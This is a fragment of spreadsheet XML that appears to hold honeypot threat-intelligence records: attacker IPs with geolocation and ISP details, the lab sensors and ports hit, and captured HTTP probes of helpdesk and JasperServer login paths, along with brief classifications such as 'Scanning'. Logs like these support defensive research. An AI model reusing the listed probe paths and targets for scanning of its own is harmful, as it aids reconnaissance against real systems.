    <t>23&amp;&amp;NA&amp;&amp;38089</t>
  </si>
  <si>
    <t>Naju-si</t>
  </si>
  <si>
    <t>Naju (Jinheung-gil)</t>
  </si>
  <si>
    <t>1840536</t>
  </si>
  <si>
    <t>35.0185</t>
  </si>
  <si>
    <t>126.795</t>
  </si>
  <si>
    <t>::ffff:d263:6ab1</t>
  </si>
  <si>
    <t>The attacker is conducting reconnaissance and attempting to exploit vulnerabilities in various systems, likely for malicious purposes such as data exfiltration or lateral movement.</t>
  </si>
  <si>
    <t>Scanning</t>
  </si>
  <si>
    <t>459eaf0ae980702f861784ce8ab977be</t>
  </si>
  <si>
    <t>27.72.82.114</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_SMB_H35</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;22&amp;&amp;19738&amp;&amp;445&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (27.72.82.114,49446)}&amp;&amp;{Data_SMB:Incoming connection (27.72.82.114,52347)}&amp;&amp;{Data_SMB:Incoming connection (27.72.82.114,59831)}&amp;&amp;{Data_SMB:Incoming connection (27.72.82.114,60369)}&amp;&amp;{Data_SMB:Incoming connection (27.72.82.114,57373)}&amp;&amp;{Data_SMB:Incoming connection (27.72.82.114,58042)}&amp;&amp;{Data_SMB:Incoming connection (27.72.82.114,63940)}&amp;&amp;{Data_SMB:Incoming connection (27.72.82.114,64519)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:1b48:5272</t>
  </si>
  <si>
    <t>b8b52334b925412d6b3ee3ef01094e66</t>
  </si>
  <si>
    <t>169.211.228.134</t>
  </si>
  <si>
    <t>::ffff:a9d3:e486</t>
  </si>
  <si>
    <t>No log data provided, therefore unable to analyze any malicious activity.</t>
  </si>
  <si>
    <t>32ca451ee7cc3832bd5a4316800a88dd</t>
  </si>
  <si>
    <t>47.154.58.227</t>
  </si>
  <si>
    <t>NA&amp;&amp;47-154-58-227.fdr01.ccmn.ca.ip.frontiernet.net</t>
  </si>
  <si>
    <t>San Bernardino</t>
  </si>
  <si>
    <t>Rancho Cucamonga</t>
  </si>
  <si>
    <t>5385955</t>
  </si>
  <si>
    <t>91729</t>
  </si>
  <si>
    <t>34.1064</t>
  </si>
  <si>
    <t>-117.593</t>
  </si>
  <si>
    <t>5650</t>
  </si>
  <si>
    <t>Frontier Communications of America, Inc.</t>
  </si>
  <si>
    <t>Frontier Communications Corporation</t>
  </si>
  <si>
    <t>Frontier Communications Solutions</t>
  </si>
  <si>
    <t>::ffff:2f9a:3ae3</t>
  </si>
  <si>
    <t>No log data provided, therefore I have nothing to analyze or report on possible malicious activity.</t>
  </si>
  <si>
    <t>b6c1738c6cff0d7386c5cb15e888a5a0</t>
  </si>
  <si>
    <t>85.29.137.56</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H35</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;50816&amp;&amp;NA</t>
  </si>
  <si>
    <t>19</t>
  </si>
  <si>
    <t>Almaty Oblysy</t>
  </si>
  <si>
    <t>Almaty (Medeū)</t>
  </si>
  <si>
    <t>43.2295</t>
  </si>
  <si>
    <t>76.9598</t>
  </si>
  <si>
    <t>21299</t>
  </si>
  <si>
    <t>Kar-Tel LLC</t>
  </si>
  <si>
    <t>2DAY Telecom LLP</t>
  </si>
  <si>
    <t>Orbita-plus LLP</t>
  </si>
  <si>
    <t>::ffff:551d:8938</t>
  </si>
  <si>
    <t>1bf22a91197d0293761dccd1eb24996f</t>
  </si>
  <si>
    <t>185.180.140.105</t>
  </si>
  <si>
    <t>NA&amp;&amp;ca-san-us-gd17-wk102a.internet-census.org</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_HTTPS_H2&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_HTTPS_H39&amp;&amp;SMA-LAB_HTTPS_H13&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_SSH_H18&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_HTTPS_H5&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_HTTPS_H10&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTPS_H23&amp;&amp;SMA-LAB_HTTPS_H6&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_HTTPS_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;443&amp;&amp;22&amp;&amp;35772&amp;&amp;8443&amp;&amp;NA&amp;&amp;3389</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.63.23', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.113.68.70', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '77.91.74.218', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.42.176', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.255.123.181', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.116.162', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.40.123', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.42.176', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.138.110', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.255.123.181', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '209.145.61.177', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.37.11', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 